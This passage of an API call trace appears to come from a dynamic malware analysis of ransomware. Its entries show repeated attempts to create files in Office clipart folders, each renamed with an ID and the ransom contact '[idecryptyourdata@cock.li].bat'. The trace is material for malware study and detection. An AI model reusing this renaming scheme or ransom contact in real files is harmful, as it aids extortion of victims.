dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.421] CloseHandle (hObject=0x430) returned 1 [0159.421] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.421] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.422] CloseHandle (hObject=0x430) returned 1 [0159.425] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.425] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.426] CloseHandle (hObject=0x430) returned 1 [0159.429] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.430] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.431] CloseHandle (hObject=0x430) returned 1 [0159.433] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.434] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.435] CloseHandle (hObject=0x430) returned 1 [0159.438] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.439] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.440] CloseHandle (hObject=0x430) returned 1 [0159.442] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.442] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.443] CloseHandle (hObject=0x430) returned 1 [0160.094] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.094] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.095] CloseHandle (hObject=0x484) returned 1 [0160.096] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.096] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.096] CloseHandle (hObject=0x484) returned 1 [0160.097] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.097] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.097] CloseHandle (hObject=0x484) returned 1 [0160.098] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.098] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.098] CloseHandle (hObject=0x484) returned 1 [0160.099] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.099] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.100] CloseHandle (hObject=0x484) returned 1 [0160.102] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.102] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.102] CloseHandle (hObject=0x484) returned 1 [0160.103] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.103] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.103] CloseHandle (hObject=0x484) returned 1 [0160.105] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.105] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.106] CloseHandle (hObject=0x484) returned 1 [0160.107] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.107] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.107] CloseHandle (hObject=0x484) returned 1 [0160.109] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.109] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.109] CloseHandle (hObject=0x484) returned 1 [0160.110] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.111] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.111] CloseHandle (hObject=0x484) returned 1 [0160.112] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.112] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.112] CloseHandle (hObject=0x484) returned 1 [0160.114] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.114] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.114] CloseHandle (hObject=0x484) returned 1 [0160.115] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.115] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.116] CloseHandle (hObject=0x484) returned 1 [0160.117] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.117] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.118] CloseHandle (hObject=0x484) returned 1 [0160.119] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.119] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.119] CloseHandle (hObject=0x484) returned 1 [0160.120] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.121] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107288.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107288.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.121] CloseHandle (hObject=0x484) returned 1 [0160.122] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.122] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.123] CloseHandle (hObject=0x484) returned 1 [0160.123] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.123] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.124] CloseHandle (hObject=0x484) returned 1 [0160.124] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.125] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.125] CloseHandle (hObject=0x484) returned 1 [0160.126] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.126] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0160.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.126] CloseHandle (hObject=0x484) returned 1 [0161.334] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0161.334] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0161.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.570] CloseHandle (hObject=0x4c0) returned 1 [0162.551] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.551] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.603] CloseHandle (hObject=0x510) returned 1 [0162.603] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.604] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.604] CloseHandle (hObject=0x510) returned 1 [0162.605] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.605] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.605] CloseHandle (hObject=0x510) returned 1 [0162.606] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.606] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.606] CloseHandle (hObject=0x510) returned 1 [0162.608] SetFilePointerEx (in: hFile=0x510, 